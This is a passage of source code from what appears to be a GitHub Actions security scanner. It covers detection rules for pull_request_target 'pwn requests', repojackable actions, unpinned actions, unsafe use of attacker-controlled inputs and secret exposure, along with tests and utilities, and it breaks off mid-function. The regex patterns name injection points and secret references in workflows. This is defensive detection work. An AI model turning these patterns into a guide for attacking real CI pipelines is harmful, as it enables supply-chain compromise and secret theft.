| /github\.event\.head_commit\.author\.name/, 15 | /github\.event\.commits\.[\w.-]*\.author\.email/, 16 | /github\.event\.commits\.[\w.-]*\.author\.name/, 17 | /github\.event\.pull_request\.head\.ref/, 18 | /github\.event\.pull_request\.head\.label/, 19 | /github\.event\.pull_request\.head\.repo\.default_branch/, 20 | /github\.event\.workflow_run\.head_branch/, 21 | /github\.event\.workflow_run\.head_commit\.message/, 22 | /github\.event\.workflow_run\.head_commit\.author\.email/, 23 | /github\.event\.workflow_run\.head_commit\.author\.name/, 24 | /github\.head_ref/, 25 | // Actions. 26 | /inputs\.[\w.-]*/, 27 | ]; 28 | 29 | export const ARTIFACT_DOWNLOAD_ACTIONS = [ 30 | 'actions/download-artifact', 31 | 'dawidd6/action-download-artifact', 32 | 'aochmann/actions-download-artifact', 33 | 'levonet/action-download-last-artifact', 34 | 'ishworkh/docker-image-artifact-download', 35 | 'ishworkh/container-image-artifact-download', 36 | 'marcofaggian/action-download-multiple-artifacts', 37 | ]; 38 | 39 | export const ARTIFACT_DOWNLOAD_API = [ 40 | 'downloadArtifact', 41 | 'getArtifact', 42 | ]; 43 | 44 | export const ARTIFACT_UPLOAD_ACTIONS = [ 45 | 'actions/upload-artifact', 46 | 'ishworkh/docker-image-artifact-upload', 47 | 'ishworkh/container-image-artifact-upload', 48 | ] 49 | 50 | export const CWD_COMPROMISABLE_RULES = [ 51 | { uses: new RegExp("nick-invision/retry"), with: { command: new RegExp("^make\\s") } }, 52 | 53 | { run: new RegExp("(?npm i(nstall)?.*)$", "m") }, 54 | { run: new RegExp("(?make\\s.*)$", "m") }, 55 | { run: new RegExp("(?poetry install.*)$", "m") }, 56 | { run: new RegExp("(?poetry run.*)$", "m") }, 57 | 58 | { run: new RegExp("[&|;]\\s*(?[.]/.*)$", "m") }, 59 | ] 60 | 61 | export const SECRET_RULES = [ 62 | { with: { "*": new RegExp("\\${{\\s+(?secrets[.].*?)\\s}}") } }, 63 | { env: { "*": new RegExp("\\${{\\s+(?secrets[.].*?)\\s}}") } }, 64 | ] 65 | -------------------------------------------------------------------------------- /lib/rules/common/finding.mjs: -------------------------------------------------------------------------------- 1 | export class Finding { 2 | constructor(rule, action, job, step, details) { 3 | this.action = action; 4 | this.rule = rule; 5 | this.job = job; 6 | this.step = step; 7 | this.details = details; 8 | } 9 | async prereport() { 10 | this.rule.prereport?.(this) 11 | } 12 | async forText() { 13 | const description = await this.rule.description?.(this); 14 | const permissions = Object.entries(await this.action.permissionsForJob(this.job)).map(([k, v]) => `${k}:${v}`).join(","); 15 | const secrets = (await this.action.secretsAfter(this.job, this.step)).flatMap(step => Object.values(step.with_secrets || []) + Object.values(step.env_secrets || [])); 16 | 17 | return { 18 | rule: this.rule.id, 19 | repo: this.action.url, 20 | subpath: this.action.subpath, 21 | job: this.job || "none", 22 | step: this.step || "none", 23 | description: description, 24 | permissions: permissions || "none", 25 | secrets: secrets.length > 0 ? secrets.join(", ") : "none", 26 | documentation: this.rule.documentation 27 | } 28 | } 29 | async toJSON() { 30 | return { 31 | "rule": { 32 | "id": this.rule.id, 33 | "documentation": this.rule.documentation, 34 | }, 35 | "description": await this.rule.description?.(this), 36 | "details": this.details, 37 | "source_uri": this.action.url, 38 | "location": { 39 | "workflow": this.action.subpath, 40 | "repo": this.action.repo?.url, 41 | "job": this.job, 42 | "step": this.step, 43 | }, 44 | "context": { 45 | "permissions": await this.action.permissionsForJob(this.job), 46 | "conditionals": await this.action.conditionsForJobStep(this.job, this.step), 47 | "subsequent_secrets": await this.action.secretsAfter(this.job, this.step), 48 | "triggered_workflows": (await this.action.triggeredWorkflows()).map(action => action.url), 49 | "used_by": this.action.usedby, 50 | "triggered_on": await this.action.on(), 51 | "runs-on": await this.action.runs_on(this.job) 52 | }, 53 | } 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /lib/rules/common/utils.mjs: -------------------------------------------------------------------------------- 1 | import { actionSteps } from "../../utils.mjs"; 2 | 3 | export function onDirectiveContains(yamlContent, value) { 4 | if (yamlContent?.on) { 5 | switch (typeof (yamlContent.on)) { 6 | case 'string': 7 | case 'array': 8 | if (yamlContent.on.includes(value)) { 9 | return true; 10 | } 11 | break; 12 | case 'object': 13 | if (Object.keys(yamlContent.on).includes(value)) { 14 | return true; 15 | } 16 | break; 17 | default: 18 | errMSg = `Unsupported yaml on: type ${typeof (yamlContent.on)}`; 19 | console.error(errMSg); 20 | throw errMSg; 21 | } 22 | } 23 | 24 | return false; 25 | } 26 | 27 | export function extractRunDirectives(yamlContent) { 28 | const runDirectives = []; 29 | 30 | // if (onDirectiveContains(yamlContent, 'pull_request')) { 31 | // return runDirectives; 32 | // } 33 | 34 | for (const [jobKey, job, step, stepid] of actionSteps(yamlContent)) { 35 | if (step.run) runDirectives.push([jobKey, job, step, stepid, step.run]) 36 | } 37 | 38 | return runDirectives; 39 | } 40 | 41 | -------------------------------------------------------------------------------- /lib/rules/pwn_request.mjs: -------------------------------------------------------------------------------- 1 | import { onDirectiveContains } from "./common/utils.mjs"; 2 | import { evaluateStepRule, stepMatches, actionSteps } from "../utils.mjs"; 3 | import { Finding } from "./common/finding.mjs"; 4 | import { CWD_COMPROMISABLE_RULES } from "./common/defs.mjs"; 5 | 6 | class PwnRequest { 7 | static id = "PWN_REQUEST" 8 | static documentation = "https://github.com/snyk/github-actions-scanner#PWN_REQUEST" 9 | 10 | static async description(finding) { 11 | return `The identified job performs a checkout of ${finding.details.ref} which, when triggered by pull_request_target, may be attacker controlled and may result in compromise of the job with higher privileges` 12 | } 13 | 14 | static async scan(action) { 15 | const yamlContent = await action.parsedContent(); 16 | let findings = []; 17 | if (!onDirectiveContains(yamlContent, 'pull_request_target')) { 18 | return findings 19 | } 20 | 21 | const PWN_REQUEST_RULES = [ 22 | { 23 | uses: new RegExp("actions/checkout"), 24 | with: { 25 | ref: new RegExp("(?github.event.pull_request.head[a-zA-Z0-9.-_]*)"), 26 | } 27 | }, 28 | { 29 | uses: new RegExp("actions/checkout"), 30 | with: { 31 | ref: new RegExp("(?refs/pull/.*/merge)"), 32 | } 33 | } 34 | ]; 35 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 36 | await Promise.all(stepMatches(PWN_REQUEST_RULES, step).map(async rule => { 37 | const { with: { ref } } = evaluateStepRule(rule, step, { with: { ref: "ref" } }); 38 | const stepid = step.name || stepidx; 39 | 40 | let potentially_compromisable_steps = []; 41 | const [stepoffset, subsequentsteps] = await action.stepsAfter(jobKey, stepid); 42 | for (const [subsequentstepidx, subsequentstep] of subsequentsteps.entries()) { 43 | const matches = stepMatches(CWD_COMPROMISABLE_RULES, subsequentstep); 44 | if (matches.length > 0) { 45 | potentially_compromisable_steps.push({ 46 | "step": subsequentstep.name || stepoffset + subsequentstepidx, 47 | "why": matches.map(rule => evaluateStepRule(rule, subsequentstep, { run: "line" })) 48 | }) 49 | } 50 | 51 | const localuses = stepMatches([{ uses: new RegExp("^./") }], subsequentstep); 52 | if (localuses.length > 0) { 53 | potentially_compromisable_steps.push({ 54 | "step": subsequentstep.name || stepoffset + subsequentstepidx, 55 | "why": `uses: ${subsequentstep.uses}` 56 | }) 57 | } 58 | } 59 | 60 | findings.push(new Finding( 61 | PwnRequest, 62 | action, 63 | jobKey, 64 | stepid, 65 | { 66 | ref, 67 | potentially_compromisable_steps 68 | } 69 | )) 70 | 71 | })) 72 | } 73 | 74 | 75 | return findings; 76 | 77 | } 78 | 79 | } 80 | 81 | export { PwnRequest as default } 82 | -------------------------------------------------------------------------------- /lib/rules/repojackable.mjs: -------------------------------------------------------------------------------- 1 | import { Finding } from "./common/finding.mjs"; 2 | import { get } from "https"; 3 | 4 | function get_statuscode(url) { 5 | return new Promise((resolve) => 6 | get(url, res => resolve(res.statusCode)) 7 | ) 8 | } 9 | 10 | class Repojackable { 11 | static id = "REPOJACKABLE" 12 | static documentation = "https://github.com/snyk/github-actions-scanner#REPOJACKABLE" 13 | 14 | static async description(finding) { 15 | return `The identified used action may be repojackable due to ${finding.details.reason}` 16 | } 17 | 18 | static async scan(_action) { 19 | const findings = []; 20 | let org; 21 | let repo; 22 | if (_action.repo === undefined) { 23 | org = _action.norepo?.org; 24 | repo = _action.norepo?.action; 25 | } else { 26 | org = _action.repo.owner; 27 | repo = _action.repo.repo; 28 | } 29 | const repostatus = await get_statuscode(`https://github.com/${org}/${repo}`); 30 | if (repostatus >= 300 && repostatus < 400) { 31 | findings.push(new Finding( 32 | Repojackable, 33 | _action, 34 | undefined, 35 | undefined, 36 | { 37 | "reason": "repository redirect" 38 | } 39 | )) 40 | } else { 41 | const orgstatus = await get_statuscode(`https://github.com/${org}`); 42 | if (orgstatus == 404) { 43 | findings.push(new Finding( 44 | Repojackable, 45 | _action, 46 | undefined, 47 | undefined, 48 | { 49 | "reason": "organisation not found" 50 | } 51 | )) 52 | 53 | } 54 | } 55 | 56 | return findings; 57 | } 58 | } 59 | 60 | export { Repojackable as default } 61 | -------------------------------------------------------------------------------- /lib/rules/test_rule.mjs: -------------------------------------------------------------------------------- 1 | import { Finding } from "./common/finding.mjs"; 2 | 3 | class TestRule { 4 | static id = "TEST_RULE" 5 | static documentation = "https://github.com/snyk/github-actions-scanner#TEST_RULE" 6 | 7 | static async description(finding) { 8 | return `This is a test rule` 9 | } 10 | 11 | static async scan(action) { 12 | const yamlContent = await action.parsedContent(); 13 | const findings = []; 14 | if (yamlContent?.on?.TEST) { 15 | findings.push(new Finding( 16 | TestRule, 17 | action, 18 | undefined, 19 | undefined 20 | )) 21 | } 22 | 23 | return findings; 24 | } 25 | } 26 | 27 | export { TestRule as default } 28 | -------------------------------------------------------------------------------- /lib/rules/unpinned_action.mjs: -------------------------------------------------------------------------------- 1 | import { Finding } from "./common/finding.mjs"; 2 | import { ACTION_NAME_REGEX } from '../utils.mjs'; 3 | 4 | const COMMIT_REGEX = new RegExp("[a-z0-9]{32}") 5 | 6 | class UnpinnedAction { 7 | static id = "UNPINNED_ACTION" 8 | static documentation = "https://github.com/snyk/github-actions-scanner#UNPINNED_ACTION" 9 | 10 | static async description(finding) { 11 | return `The action ${finding.details.uses} is used with branch/tag ${finding.details.ref} rather than a pinned commit.` 12 | } 13 | 14 | static async scan(action) { 15 | const findings = []; 16 | 17 | for (const [step, usedby] of await action.getAllUses()) { 18 | if (step.uses.startsWith(".")) continue; // repo-local action 19 | let { groups: { ref } } = step.uses.match(ACTION_NAME_REGEX) 20 | if (!ref.match(COMMIT_REGEX)) { 21 | findings.push(new Finding( 22 | UnpinnedAction, 23 | action, 24 | usedby.job, 25 | usedby.step, 26 | { 27 | uses: step.uses, 28 | ref 29 | } 30 | )) 31 | } 32 | } 33 | 34 | return findings; 35 | } 36 | } 37 | 38 | export { UnpinnedAction as default } 39 | -------------------------------------------------------------------------------- /lib/rules/unsafe_input_assign.mjs: -------------------------------------------------------------------------------- 1 | import { stepMatches, evaluateStepRule, actionSteps } from "../utils.mjs"; 2 | import { UNTRUSTED_INPUT } from "./common/defs.mjs"; 3 | import { Finding } from "./common/finding.mjs"; 4 | 5 | const UNTRUSTED_INPUT_RULES = UNTRUSTED_INPUT.map(input => { 6 | return { 7 | with: { "*": new RegExp(`[$]{{[^}]*?(?${input.source})[^}]*}}`, "m") } 8 | } 9 | }) 10 | 11 | class UnsafeInputAssign { 12 | static id = "UNSAFE_INPUT_ASSIGN" 13 | static documentation = "https://github.com/snyk/github-actions-scanner#UNSAFE_INPUT_ASSIGN" 14 | 15 | static async description(finding) { 16 | return `The identified step passes the potentially attacker controlled value ${finding.details.value}. This may result in undesirable behaviour` 17 | } 18 | 19 | static async scan(action) { 20 | let findings = []; 21 | for (const [jobKey, job, step, stepidx] of actionSteps(await action.parsedContent())) { 22 | stepMatches(UNTRUSTED_INPUT_RULES, step).forEach( 23 | rule => findings.push(new Finding( 24 | UnsafeInputAssign, 25 | action, 26 | jobKey, 27 | step.name || stepidx, 28 | { 29 | "with_item": evaluateStepRule(rule, step).with, 30 | "value": Object.values(evaluateStepRule(rule, step, { with: { "*": "src" } }).with) 31 | } 32 | )) 33 | ) 34 | } 35 | return findings; 36 | } 37 | } 38 | 39 | export { UnsafeInputAssign as default } 40 | -------------------------------------------------------------------------------- /lib/rules/workflow_run.mjs: -------------------------------------------------------------------------------- 1 | import { onDirectiveContains } from "./common/utils.mjs"; 2 | import { actionSteps } from "../utils.mjs"; 3 | import { Finding } from "./common/finding.mjs"; 4 | 5 | class WorkflowRun { 6 | static id = "WORKFLOW_RUN" 7 | static documentation = "https://github.com/snyk/github-actions-scanner#WORKFLOW_RUN" 8 | 9 | static async scan(action) { 10 | const yamlContent = await action.parsedContent(); 11 | let findings = []; 12 | if (!onDirectiveContains(yamlContent, 'workflow_run')) { 13 | return findings; 14 | } 15 | for (const [jobKey, job, step, stepidx] of actionSteps(yamlContent)) { 16 | if ( 17 | step.uses?.includes("actions/checkout") && 18 | step.with?.ref?.includes("github.event.workflow_run") 19 | ) { 20 | findings.push(new Finding( 21 | WorkflowRun, 22 | action, 23 | jobKey, 24 | step.name || stepidx, 25 | { 26 | 'on': yamlContent.on, 27 | 'if': job?.if ? job.if : '', 28 | 'uses': step.uses, 29 | 'with': step.with 30 | } 31 | )) 32 | } 33 | } 34 | return findings; 35 | } 36 | } 37 | 38 | export { WorkflowRun as default } 39 | -------------------------------------------------------------------------------- /lib/scanner.mjs: -------------------------------------------------------------------------------- 1 | import fs from 'fs'; 2 | import path from 'path'; 3 | import { fileURLToPath } from 'url'; 4 | import { logger } from "./utils.mjs"; 5 | 6 | export class Scanner { 7 | static async new(options) { 8 | const s = new Scanner(); 9 | await s.loadRules(options.scanRules); 10 | s.scanned = 0; 11 | return s; 12 | } 13 | async loadRules(scanRules) { 14 | const __dirname = path.dirname(fileURLToPath(import.meta.url)); 15 | const rulesDir = path.join(__dirname, 'rules'); 16 | const ruleFiles = fs.readdirSync(rulesDir).filter(file => file.endsWith('.mjs')); 17 | 18 | const rules = await Promise.all( 19 | ruleFiles.map(file => 20 | import(`./rules/${file}`) 21 | ) 22 | ); 23 | 24 | const scanRulesNegate = scanRules ? scanRules.every(rule => rule.startsWith("!")) : false; 25 | 26 | this.rules = rules 27 | .map(ruleModule => ruleModule.default) 28 | .filter(rule => rule) 29 | .filter(rule => { 30 | if (!scanRules) return true; 31 | if (scanRulesNegate) { 32 | return !scanRules.includes("!" + rule.id) 33 | } else { 34 | return scanRules.includes(rule.id); 35 | } 36 | } 37 | ); 38 | logger.debug(`The following rules are enabled: ${this.rules.map(rule => rule.id).join(",")}`) 39 | } 40 | 41 | async scanAction(action) { 42 | this.scanned += 1; 43 | let findings = []; 44 | for (let rule of this.rules) { 45 | try { 46 | const rulefindings = await rule.scan(action) 47 | findings.push(...rulefindings); 48 | } catch (e) { 49 | logger.warn(`Failed to scan with ${rule.name} for ${action.repo.owner}/${action.repo.repo}/${action.subpath}@${action.repo.ref}: ${e.message}`) 50 | } 51 | } 52 | return findings; 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /lib/test/actions.test.js: -------------------------------------------------------------------------------- 1 | import { Org, Repo, Action } from '../actions.mjs'; 2 | 3 | 4 | test("Validate Repo fromUrl", async () => { 5 | { 6 | const R = await Repo.fromUrl("https://github.com/snyk/cli") 7 | expect(R.owner).toBe("snyk") 8 | expect(R.repo).toBe("cli") 9 | expect(R.subpath).toBe(undefined) 10 | expect(R.ref).toBe("main") 11 | } 12 | { 13 | const R = await Repo.fromUrl("https://github.com/snyk/cli/commit/aaaa") 14 | expect(R.owner).toBe("snyk") 15 | expect(R.repo).toBe("cli") 16 | expect(R.subpath).toBe(undefined) 17 | expect(R.ref).toBe("aaaa") 18 | } 19 | 20 | }) 21 | 22 | test("Validate Action.fromUses parsing", async () => { 23 | const R = await Repo.fromUrl("https://github.com/snyk/cli") 24 | 25 | const A1 = await Action.fromUses(R, "./") 26 | expect(A1.subpath).toBe("action.yml") 27 | 28 | const A2 = await Action.fromUses(R, "./.github/actions/hello-world-action") 29 | expect(A2.subpath).toBe(".github/actions/hello-world-action/action.yml") 30 | 31 | const A3 = await Action.fromUses(R, "actions/checkout@v4") 32 | expect(A3.repo.owner).toBe("actions") 33 | expect(A3.repo.repo).toBe("checkout") 34 | expect(A3.repo.ref).toBe("v4") 35 | expect(A3.subpath).toBe("action.yml") 36 | }) 37 | 38 | test("Validate Action findOrCreate", async () => { 39 | const R = await Repo.fromUrl("https://github.com/snyk/cli") 40 | 41 | { 42 | const A = await Action.fromUses(R, "actions/checkout@v4") 43 | expect(A.repo.owner).toBe("actions") 44 | expect(A.repo.repo).toBe("checkout") 45 | expect(A.repo.ref).toBe("v4") 46 | } 47 | 48 | const R2 = await Repo.fromUrl("https://github.com/actions/checkout/commit/v4") 49 | { 50 | const A = await Action.fromUses(R, "actions/checkout@v4") 51 | expect(A.repo).toEqual(R2) 52 | } 53 | }) 54 | 55 | test("Validate Action.fromUrl", async () => { 56 | const A = await Action.fromUrl("https://github.com/snyk/cli") 57 | expect(A.repo.owner).toBe("snyk") 58 | expect(A.repo.repo).toBe("cli") 59 | expect(A.repo.ref).toBe("main") 60 | expect(A.subpath).toBe("action.yml") 61 | }); 62 | -------------------------------------------------------------------------------- /lib/test/clone.test.js: -------------------------------------------------------------------------------- 1 | import { Git } from '../clone.mjs'; 2 | import { statSync } from 'fs'; 3 | 4 | test("Ensure Git tidies up", () => { 5 | const G = new Git(); 6 | 7 | let stat = statSync(G.directory, { 8 | throwIfNoEntry: false 9 | }); 10 | expect(stat).not.toBe(undefined); 11 | expect(stat.isDirectory()).toBe(true); 12 | 13 | G.cleanup(); 14 | stat = statSync(G.directory, { 15 | throwIfNoEntry: false 16 | }); 17 | expect(stat).toBe(undefined); 18 | }) 19 | 20 | test("Ensure Git can successfully clone", () => { 21 | const G = new Git(); 22 | 23 | let stat = statSync(`${G.directory}/README.md`, { 24 | throwIfNoEntry: false 25 | }); 26 | expect(stat).toBe(undefined); 27 | 28 | G.clone("https://github.com/snyk/cli") 29 | 30 | stat = statSync(`${G.directory}/README.md`, { 31 | throwIfNoEntry: false 32 | }); 33 | expect(stat).not.toBe(undefined); 34 | expect(stat.isFile()).toBe(true); 35 | 36 | G.cleanup(); 37 | }) 38 | -------------------------------------------------------------------------------- /lib/test/rules_common_utils.test.js: -------------------------------------------------------------------------------- 1 | import { stepMatches, evaluateStepRule } from "../utils.mjs"; 2 | 3 | test("Test recursive rule match", () => { 4 | const RULES = [ 5 | { uses: new RegExp("nick-invision/retry"), with: { command: new RegExp("make") } } 6 | ] 7 | 8 | const step = { 9 | name: 'Run PAT E2E', 10 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 11 | env: { GITHUB_AUTH_TOKEN: '${{ secrets.GH_AUTH_TOKEN }}' }, 12 | with: { 13 | max_attempts: 3, 14 | retry_on: 'error', 15 | timeout_minutes: 30, 16 | command: 'make e2e-pat' 17 | } 18 | } 19 | 20 | const matches = stepMatches(RULES, step); 21 | 22 | expect(matches.length).toBe(1); 23 | }) 24 | 25 | test("Test recursive rule match with wildcard", () => { 26 | const RULES = [ 27 | { env: { "*": new RegExp("\\${{\\s*secrets[.]") } } 28 | ] 29 | 30 | const step = { 31 | name: 'Run GITHUB_TOKEN E2E', 32 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 33 | env: { 34 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 35 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 36 | }, 37 | with: { 38 | max_attempts: 3, 39 | retry_on: 'error', 40 | timeout_minutes: 30, 41 | command: 'make e2e-gh-token' 42 | } 43 | } 44 | 45 | const matches = stepMatches(RULES, step); 46 | 47 | expect(matches.length).toBe(1); 48 | }) 49 | 50 | test("Test recursive rule match with two rules", () => { 51 | const RULES = [ 52 | { env: { "*": new RegExp("\\${{\\s*secrets[.]") } }, 53 | { with: { DOESNTMATCH: true } } 54 | ] 55 | 56 | const step = { 57 | name: 'Run GITHUB_TOKEN E2E', 58 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 59 | env: { 60 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 61 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 62 | }, 63 | with: { 64 | max_attempts: 3, 65 | retry_on: 'error', 66 | timeout_minutes: 30, 67 | command: 'make e2e-gh-token' 68 | } 69 | } 70 | 71 | const matches = stepMatches(RULES, step); 72 | 73 | expect(matches.length).toBe(1); 74 | }) 75 | 76 | test("Test recursive rule match with nonmatching rule", () => { 77 | const RULES = [ 78 | { with: { DOESNTMATCH: true } } 79 | ] 80 | 81 | const step = { 82 | name: 'Run GITHUB_TOKEN E2E', 83 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 84 | env: { 85 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 86 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 87 | }, 88 | with: { 89 | max_attempts: 3, 90 | retry_on: 'error', 91 | timeout_minutes: 30, 92 | command: 'make e2e-gh-token' 93 | } 94 | } 95 | 96 | const matches = stepMatches(RULES, step); 97 | 98 | expect(matches.length).toBe(0); 99 | }) 100 | 101 | test("Test recursive rule match with close but nonmatching rule", () => { 102 | const RULES = [ 103 | { env: { "DOESNTMATCH": new RegExp("\\${{\\s*secrets[.]") } }, 104 | ] 105 | 106 | const step = { 107 | name: 'Run GITHUB_TOKEN E2E', 108 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 109 | env: { 110 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 111 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 112 | }, 113 | with: { 114 | max_attempts: 3, 115 | retry_on: 'error', 116 | timeout_minutes: 30, 117 | command: 'make e2e-gh-token' 118 | } 119 | } 120 | 121 | const matches = stepMatches(RULES, step); 122 | 123 | expect(matches.length).toBe(0); 124 | }) 125 | 126 | test("Test recursive rule match with not present key", () => { 127 | const RULES = [ 128 | { env: { "DOESNTMATCH": undefined } }, 129 | ] 130 | 131 | const step = { 132 | name: 'Run GITHUB_TOKEN E2E', 133 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 134 | env: { 135 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 136 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 137 | }, 138 | with: { 139 | max_attempts: 3, 140 | retry_on: 'error', 141 | timeout_minutes: 30, 142 | command: 'make e2e-gh-token' 143 | } 144 | } 145 | 146 | const matches = stepMatches(RULES, step); 147 | 148 | expect(matches.length).toBe(1); 149 | }) 150 | 151 | test("Test recursive rule negative match with not present key", () => { 152 | const RULES = [ 153 | { env: { "DOESNTMATCH": undefined } }, 154 | ] 155 | 156 | const step = { 157 | name: 'Run GITHUB_TOKEN E2E', 158 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 159 | env: { 160 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 161 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}', 162 | DOESNTMATCH: "true" 163 | }, 164 | with: { 165 | max_attempts: 3, 166 | retry_on: 'error', 167 | timeout_minutes: 30, 168 | command: 'make e2e-gh-token' 169 | } 170 | } 171 | 172 | const matches = stepMatches(RULES, step); 173 | 174 | expect(matches.length).toBe(0); 175 | }) 176 | 177 | test("Test rule evalator", () => { 178 | const RULE = { env: { "*": "FINDME" } }; 179 | 180 | const step = { 181 | foo: "bar", 182 | env: { 183 | "abc": "FINDME", 184 | "def": "notme", 185 | "ghi": "FINDME" 186 | } 187 | } 188 | 189 | const evaluated = evaluateStepRule(RULE, step) 190 | 191 | expect(evaluated).toEqual({ 192 | "env": { 193 | "abc": "FINDME", 194 | "ghi": "FINDME", 195 | } 196 | }) 197 | }) 198 | 199 | test("Test rule evalator with regex", () => { 200 | const RULE = { env: { "*": new RegExp(".INDME") } }; 201 | 202 | const step = { 203 | foo: "bar", 204 | env: { 205 | "abc": "FINDME", 206 | "def": "notme", 207 | "ghi": "FINDME" 208 | } 209 | } 210 | 211 | const evaluated = evaluateStepRule(RULE, step) 212 | 213 | expect(evaluated).toEqual({ 214 | "env": { 215 | "abc": "FINDME", 216 | "ghi": "FINDME", 217 | } 218 | }) 219 | }) 220 | 221 | test("Test rule evalator with regex groups", () => { 222 | const RULE = { env: { "*": new RegExp("FINDME(?...)") } }; 223 | 224 | const step = { 225 | foo: "bar", 226 | env: { 227 | "abc": "FINDMEabc", 228 | "def": "notme", 229 | "ghi": "FINDMEdef" 230 | } 231 | } 232 | 233 | const evaluated = evaluateStepRule(RULE, step, { env: { "*": "suffix" } }) 234 | 235 | expect(evaluated).toEqual({ 236 | "env": { 237 | "abc": "abc", 238 | "ghi": "def", 239 | } 240 | }) 241 | }) 242 | -------------------------------------------------------------------------------- /lib/test/utils.test.js: -------------------------------------------------------------------------------- 1 | import { GITHUB_URL_RE } from '../utils.mjs'; 2 | 3 | test("Validate GITHUB_URL_RE", () => { 4 | const url = "https://github.com/snyk/github-actions-scanner"; 5 | const matched = url.match(GITHUB_URL_RE); 6 | 7 | expect(matched).not.toBe(undefined); 8 | expect(matched).not.toBe(null); 9 | 10 | expect(matched.groups?.owner).toBe("snyk"); 11 | expect(matched.groups?.repo).toBe("github-actions-scanner"); 12 | }) 13 | 14 | test("Validate GITHUB_URL_RE with ref", () => { 15 | const url = "https://github.com/snyk/github-actions-scanner/commit/da9d1b0a1dc97dc89cd12569a01636c21900a102"; 16 | const matched = url.match(GITHUB_URL_RE); 17 | 18 | expect(matched).not.toBe(undefined); 19 | expect(matched).not.toBe(null); 20 | 21 | expect(matched.groups?.owner).toBe("snyk"); 22 | expect(matched.groups?.repo).toBe("github-actions-scanner"); 23 | expect(matched.groups?.ref).toBe("da9d1b0a1dc97dc89cd12569a01636c21900a102"); 24 | }) 25 | -------------------------------------------------------------------------------- /lib/utils.mjs: -------------------------------------------------------------------------------- 1 | import { clearTimeout, setTimeout } from 'node:timers'; 2 | import { get } from 'node:https'; 3 | import { extract } from 'tar-stream'; 4 | import gunzip from 'gunzip-maybe'; 5 | import { inspect } from 'util'; 6 | import chalk from 'chalk'; 7 | import winston from 'winston'; 8 | 9 | export const GITHUB_URL_RE = new RegExp("https://github.com/(?[^/]+)/(?[^/]+)(/commit/(?[0-9a-z-.]+))?") 10 | export const ACTION_NAME_REGEX = new RegExp("^(?[^/]*)/(?[^@/]*)(/(?[^@]*))?(@(?.*))?") 11 | 12 | const GITHUB_ACTIONS_FILE_MATCH = ['**/action.(yml|yaml)', '.github/actions/**/action.(yml|yaml)', '.github/workflows/*.(yml|yaml)'] 13 | const GITHUB_ACTIONS_FILE_REGEX = new RegExp(`^(.github/(actions/.*/action[.]ya?ml|workflows/.*[.]ya?ml)|(.*/)?action[.]ya?ml)$`) 14 | 15 | const loggerformat = winston.format.printf(({ level, message, label, timestamp }) => { 16 | return `${timestamp} ${level}: ${message}`; 17 | }); 18 | export const logger = winston.createLogger({ 19 | level: process.env.LOG_LEVEL || 'info', 20 | format: winston.format.combine( 21 | winston.format.timestamp(), 22 | winston.format.colorize(), 23 | loggerformat 24 | ), 25 | transports: [ 26 | new winston.transports.Console(), 27 | ] 28 | }); 29 | 30 | export async function getFilesFromArchive(tgzUrl, maxSize = 5 * 1024 * 1024) { 31 | const timer = setTimeout(() => { 32 | logger.warn(chalk.grey('getFilesFromArchive STUCK', tgzUrl, filesToExtract)); 33 | }, 30000); 34 | timer.unref(); 35 | 36 | let chunksSize = 0; 37 | const result = { 38 | filesExtracted: {}, 39 | files: [], 40 | finished: false, 41 | }; 42 | 43 | return new Promise((resolve, reject) => { 44 | const streamExtractor = extract(); 45 | 46 | streamExtractor.on('entry', (header, stream, next) => { 47 | if (header.type === 'file') { 48 | const relname = header.name.slice(header.name.indexOf("/") + 1) 49 | if (relname.match(GITHUB_ACTIONS_FILE_REGEX)) { 50 | result.filesExtracted[relname] = "" 51 | stream.on('data', (chunk) => { 52 | result.filesExtracted[relname] += chunk.toString(); 53 | }); 54 | } 55 | } 56 | 57 | stream.on('end', () => { 58 | next(); 59 | }); 60 | 61 | stream.resume(); 62 | }); 63 | 64 | const request = get(tgzUrl, (response) => { 65 | if (response.statusCode !== 200) { 66 | return reject(new Error(`Non 200 response: ${response.statusCode}`)); 67 | } 68 | 69 | response.on('data', (chunk) => { 70 | chunksSize += chunk.length; 71 | 72 | if (chunksSize >= maxSize) { 73 | response.destroy(); 74 | request.destroy(); 75 | } 76 | }); 77 | 78 | response.on('end', () => { 79 | result.finished = true; 80 | }); 81 | 82 | response.pipe(gunzip()).pipe(streamExtractor); 83 | }); 84 | 85 | let error = null; 86 | 87 | request.on('error', (e) => { 88 | error = e; 89 | }); 90 | 91 | streamExtractor.on('error', (e) => { 92 | error = e; 93 | }); 94 | 95 | request.on('close', () => { 96 | if (result.finished) { 97 | streamExtractor.on('finish', () => { 98 | error ? reject(error) : resolve(result.filesExtracted); 99 | clearTimeout(timer); 100 | }); 101 | } else { 102 | error ? reject(error) : resolve(result.filesExtracted); 103 | clearTimeout(timer); 104 | } 105 | }); 106 | }); 107 | } 108 | 109 | export function prettyPrint(data) { 110 | console.log(inspect(data, { colors: true, depth: null })); 111 | } 112 | 113 | export function* actionSteps(yamlContent) { 114 | if (yamlContent?.jobs) { 115 | for (const jobKey of 